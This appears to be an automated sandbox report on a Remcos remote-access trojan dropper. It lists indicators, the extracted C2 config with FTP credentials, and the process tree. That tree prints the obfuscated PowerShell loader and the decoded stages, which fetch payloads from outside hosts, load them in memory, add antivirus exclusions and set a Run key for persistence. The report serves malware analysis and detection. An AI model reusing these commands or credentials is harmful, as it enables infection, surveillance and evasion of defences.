remcos | 601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6

Analysis

max time kernel
149s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs
Size

681KB
MD5

c92735c228647df18945e50e80630e89
SHA1

a8e770aa44e41a62534f0ae5c6f5b7cc7ad2002e
SHA256

601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6
SHA512

9b1a6f215ff69c9bab7a6016e49ced06a0c4f932bc36135aba6a1c3e46ff6d2c9d41e2461c48696b59684b5358754813ed0df5df55f4307edfc16481ee7ea61a
SSDEEP

1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222D:6OGHvYKaY

Score

10^/10

remcos 40/40fr defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

remcos

Botnet

40/40FR

techsupport.ddnsking.com:40404

techsupport40.ddnsking.com:40405

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-SWD9K1
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 7 IoCs

flow	pid	Process
9	3380	powershell.exe
17	3380	powershell.exe
19	3380	powershell.exe
21	3380	powershell.exe
23	3380	powershell.exe
24	3380	powershell.exe
27	1952	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3188	powershell.exe
3380	powershell.exe
3752	powershell.exe
1952	powershell.exe
1752	powershell.exe
1076	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_fmd = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\zemmu.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	pastebin.com
27	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1952 set thread context of 4108	1952	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3188	powershell.exe
3188	powershell.exe
3380	powershell.exe
3380	powershell.exe
3380	powershell.exe
1752	powershell.exe
1076	powershell.exe
1076	powershell.exe
1752	powershell.exe
3752	powershell.exe
3752	powershell.exe
1952	powershell.exe
1952	powershell.exe
1952	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	1952	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4108	RegAsm.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1280 wrote to memory of 3188	1280	WScript.exe	82
PID 1280 wrote to memory of 3188	1280	WScript.exe	82
PID 3188 wrote to memory of 3380	3188	powershell.exe	84
PID 3188 wrote to memory of 3380	3188	powershell.exe	84
PID 3380 wrote to memory of 1752	3380	powershell.exe	89
PID 3380 wrote to memory of 1752	3380	powershell.exe	89
PID 3380 wrote to memory of 1076	3380	powershell.exe	90
PID 3380 wrote to memory of 1076	3380	powershell.exe	90
PID 3380 wrote to memory of 4616	3380	powershell.exe	91
PID 3380 wrote to memory of 4616	3380	powershell.exe	91
PID 3380 wrote to memory of 3752	3380	powershell.exe	92
PID 3380 wrote to memory of 3752	3380	powershell.exe	92
PID 3380 wrote to memory of 1952	3380	powershell.exe	94
PID 3380 wrote to memory of 1952	3380	powershell.exe	94
PID 3380 wrote to memory of 4640	3380	powershell.exe	95
PID 3380 wrote to memory of 4640	3380	powershell.exe	95
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96
PID 1952 wrote to memory of 4108	1952	powershell.exe	96

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBwЌз革GEЌз革cwB0Ќз革GUЌз革YgBpЌз革G4Ќз革LgBmЌз革HIЌз革LwBwЌз革GEЌз革cwB0Ќз革GUЌз革YgBpЌз革G4Ќз革LgBwЌз革GgЌз革cЌз革Ќз革/Ќз革GQЌз革bЌз革Ќз革9Ќз革DEЌз革NЌз革Ќз革xЌз革DcЌз革NЌз革Ќз革wЌз革CcЌз革IЌз革Ќз革oЌз革CЌз革Ќз革XQBdЌз革FsЌз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革WwЌз革gЌз革CwЌз革IЌз革BsЌз革GwЌз革dQBuЌз革CQЌз革IЌз革Ќз革oЌз革GUЌз革awBvЌз革HYЌз革bgBJЌз革C4Ќз革KQЌз革gЌз革CcЌз革SQBWЌз革EYЌз革cgBwЌз革CcЌз革IЌз革Ќз革oЌз革GQЌз革bwBoЌз革HQЌз革ZQBNЌз革HQЌз革ZQBHЌз革C4Ќз革KQЌз革nЌз革DEЌз革cwBzЌз革GEЌз革bЌз革BDЌз革C4Ќз革MwB5Ќз革HIЌз革YQByЌз革GIЌз革aQBMЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革nЌз革CgЌз革ZQBwЌз革HkЌз革VЌз革B0Ќз革GUЌз革RwЌз革uЌз革CkЌз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革CgЌз革ZЌз革BhЌз革G8Ќз革TЌз革Ќз革uЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HQЌз革bgBlЌз革HIЌз革cgB1Ќз革EMЌз革OgЌз革6Ќз革F0Ќз革bgBpЌз革GEЌз革bQBvЌз革EQЌз革cЌз革BwЌз革EEЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革EEЌз革JwЌз革gЌз革CwЌз革IЌз革Ќз革nЌз革JMhOgCTIScЌз革IЌз革Ќз革oЌз革GUЌз革YwBhЌз革GwЌз革cЌз革BlЌз革FIЌз革LgBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwЌз革0Ќз革DYЌз革ZQBzЌз革GEЌз革QgBtЌз革G8Ќз革cgBGЌз革DoЌз革OgBdЌз革HQЌз革cgBlЌз革HYЌз革bgBvЌз革EMЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革FoЌз革YwBCЌз革GMЌз革YQЌз革kЌз革CЌз革Ќз革XQBdЌз革FsЌз革ZQB0Ќз革HkЌз革QgBbЌз革DsЌз革JwЌз革lЌз革EkЌз革aЌз革BxЌз革FIЌз革WЌз革Ќз革lЌз革CcЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZQBqЌз革HcЌз革egBoЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革YgByЌз革HkЌз革dQЌз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GIЌз革cgB5Ќз革HUЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BiЌз革HIЌз革eQB1Ќз革CQЌз革OwЌз革pЌз革CgЌз革ZQBzЌз革G8Ќз革cЌз革BzЌз革GkЌз革ZЌз革Ќз革uЌз革GIЌз革cgB5Ќз革HUЌз革JЌз革Ќз革7Ќз革CkЌз革IЌз革Ќз革nЌз革HQЌз革eЌз革B0Ќз革C4Ќз革MQЌз革wЌз革EwЌз革TЌз革BEЌз革C8Ќз革MQЌз革wЌз革C8Ќз革cgBlЌз革HQЌз革cЌз革B5Ќз革HIЌз革YwBwЌз革FUЌз革LwByЌз革GIЌз革LgBtЌз革G8Ќз革YwЌз革uЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LgBwЌз革HQЌз革ZgBЌз革Ќз革DEЌз革dЌз革BhЌз革HIЌз革YgB2Ќз革GsЌз革YwBzЌз革GUЌз革ZЌз革Ќз革vЌз革C8Ќз革OgBwЌз革HQЌз革ZgЌз革nЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgBiЌз革HIЌз革eQB1Ќз革CQЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革CkЌз革JwBЌз革Ќз革EЌз革Ќз革cЌз革BKЌз革DgЌз革NwЌз革1Ќз革DEЌз革MgBvЌз革HIЌз革cЌз革ByЌз革GUЌз革cЌз革BvЌз革GwЌз革ZQB2Ќз革GUЌз革ZЌз革Ќз革nЌз革CwЌз革KQЌз革pЌз革DkЌз革NЌз革Ќз革sЌз革DYЌз革MQЌз革xЌз革CwЌз革NwЌз革5Ќз革CwЌз革NЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革4Ќз革DkЌз革LЌз革Ќз革4Ќз革DEЌз革MQЌз革sЌз革DcЌз革MЌз革Ќз革xЌз革CwЌз革OQЌз革5Ќз革CwЌз革NQЌз革xЌз革DEЌз革LЌз革Ќз革xЌз革DЌз革Ќз革MQЌз革sЌз革DЌз革Ќз革MЌз革Ќз革xЌз革CgЌз革XQBdЌз革FsЌз革cgBhЌз革GgЌз革YwBbЌз革CЌз革Ќз革bgBpЌз革G8Ќз革agЌз革tЌз革CgЌз革KЌз革BsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革GsЌз革cgBvЌз革HcЌз革dЌз革BlЌз革E4Ќз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革LQB3Ќз革GUЌз革bgЌз革gЌз革D0Ќз革IЌз革BzЌз革GwЌз革YQBpЌз革HQЌз革bgBlЌз革GQЌз革ZQByЌз革EMЌз革LgBiЌз革HIЌз革eQB1Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GIЌз革cgB5Ќз革HUЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BiЌз革HIЌз革eQB1Ќз革CQЌз革OwBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革MgЌз革xЌз革HMЌз革bЌз革BUЌз革DoЌз革OgBdЌз革GUЌз革cЌз革B5Ќз革FQЌз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BsЌз革G8Ќз革YwBvЌз革HQЌз革bwByЌз革FЌз革Ќз革eQB0Ќз革GkЌз革cgB1Ќз革GMЌз革ZQBTЌз革DoЌз革OgBdЌз革HIЌз革ZQBnЌз革GEЌз革bgBhЌз革E0Ќз革dЌз革BuЌз革GkЌз革bwBQЌз革GUЌз革YwBpЌз革HYЌз革cgBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革OwB9Ќз革GUЌз革dQByЌз革HQЌз革JЌз革B7Ќз革CЌз革Ќз革PQЌз革gЌз革GsЌз革YwBhЌз革GIЌз革bЌз革BsЌз革GEЌз革QwBuЌз革G8Ќз革aQB0Ќз革GEЌз革ZЌз革BpЌз革GwЌз革YQBWЌз革GUЌз革dЌз革BhЌз革GMЌз革aQBmЌз革GkЌз革dЌз革ByЌз革GUЌз革QwByЌз革GUЌз革dgByЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革IЌз革BmЌз革C8Ќз革IЌз革Ќз革wЌз革CЌз革Ќз革dЌз革Ќз革vЌз革CЌз革Ќз革cgЌз革vЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBuЌз革HcЌз革bwBkЌз革HQЌз革dQBoЌз革HMЌз革IЌз革Ќз革7Ќз革CcЌз革MЌз革Ќз革4Ќз革DEЌз革IЌз革BwЌз革GUЌз革ZQBsЌз革HMЌз革JwЌз革gЌз革GQЌз革bgBhЌз革G0Ќз革bQBvЌз革GMЌз革LQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革7Ќз革CЌз革Ќз革ZQBjЌз革HIЌз革bwBmЌз革C0Ќз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBwЌз革HUЌз革dЌз革ByЌз革GEЌз革dЌз革BTЌз革FwЌз革cwBtЌз革GEЌз革cgBnЌз革G8Ќз革cgBQЌз革FwЌз革dQBuЌз革GUЌз革TQЌз革gЌз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革dwBvЌз革GQЌз革bgBpЌз革FcЌз革XЌз革B0Ќз革GYЌз革bwBzЌз革G8Ќз革cgBjЌз革GkЌз革TQBcЌз革GcЌз革bgBpЌз革G0Ќз革YQBvЌз革FIЌз革XЌз革BhЌз革HQЌз革YQBEЌз革HЌз革Ќз革cЌз革BBЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革gЌз革CgЌз革IЌз革BuЌз革G8Ќз革aQB0Ќз革GEЌз革bgBpЌз革HQЌз革cwBlЌз革EQЌз革LQЌз革gЌз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革bQBlЌз革HQЌз革SQЌз革tЌз革HkЌз革cЌз革BvЌз革EMЌз革IЌз革Ќз革7Ќз革CЌз革Ќз革dЌз革ByЌз革GEЌз革dЌз革BzЌз革GUЌз革cgBvЌз革G4Ќз革LwЌз革gЌз革HQЌз革ZQBpЌз革HUЌз革cQЌз革vЌз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBhЌз革HMЌз革dQB3Ќз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBsЌз革GwЌз革ZQBoЌз革HMЌз革cgBlЌз革HcЌз革bwBwЌз革CЌз革Ќз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革DsЌз革KQЌз革gЌз革GUЌз革bQBhЌз革E4Ќз革cgBlЌз革HMЌз革VQЌз革6Ќз革DoЌз革XQB0Ќз革G4Ќз革ZQBtЌз革G4Ќз革bwByЌз革GkЌз革dgBuЌз革EUЌз革WwЌз革gЌз革CsЌз革IЌз革Ќз革nЌз革FwЌз革cwByЌз革GUЌз革cwBVЌз革FwЌз革OgBDЌз革CcЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革7Ќз革CkЌз革JwB1Ќз革HMЌз革bQЌз革uЌз革G4Ќз革aQB3Ќз革HЌз革Ќз革VQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革ZЌз革BJЌз革FIЌз革aQBNЌз革CQЌз革IЌз革Ќз革sЌз革EIЌз革SwBMЌз革FIЌз革VQЌз革kЌз革CgЌз革ZQBsЌз革GkЌз革RgBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgB4Ќз革GgЌз革SgBIЌз革HkЌз革JЌз革Ќз革7Ќз革DgЌз革RgBUЌз革FUЌз革OgЌз革6Ќз革F0Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革dЌз革B4Ќз革GUЌз革VЌз革Ќз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革dЌз革BPЌз革EwЌз革YwBfЌз革EsЌз革YQЌз革zЌз革FoЌз革ZgBvЌз革FgЌз革MgBKЌз革EoЌз革cgBWЌз革GgЌз革bQBWЌз革DkЌз革YwBtЌз革DkЌз革WЌз革BzЌз革HUЌз革WЌз革BtЌз革GoЌз革MQBnЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革OwЌз革gЌз革CkЌз革JwЌз革yЌз革DQЌз革dQBYЌз革EoЌз革VЌз革BxЌз革GEЌз革bQBnЌз革HkЌз革TQB0Ќз革EYЌз革egBhЌз革GsЌз革UЌз革BSЌз革DEЌз革cQBfЌз革EkЌз革dgBHЌз革GkЌз革WЌз革BOЌз革GQЌз革cQBhЌз革E4Ќз革MQЌз革nЌз革CЌз革Ќз革KwЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革CgAIAA9ACAARgBhAEUAWQBSACQAewAgACkAIABXAGkAaQBCAHMAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAFcAaQBpAEIAcwAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABGAGEARQBZAFIAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABkAEkAUgBpAE0AJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAZABJAFIAaQBNACQAewAgACkAIABGAGQATQBRAFQAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABGAGQATQBRAFQAJAAgADsA';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs');powershell $IedxR
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$uyrb = (New-Object Net.WebClient);$uyrb.Encoding = [System.Text.Encoding]::UTF8;$uyrb.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $uyrb.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$uyrb.dispose();$uyrb = (New-Object Net.WebClient);$uyrb.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $uyrb.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '047141=ld?php.nibetsap/rf.nibetsap//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1076
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:4616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\zemmu.ps1"
      4⤵
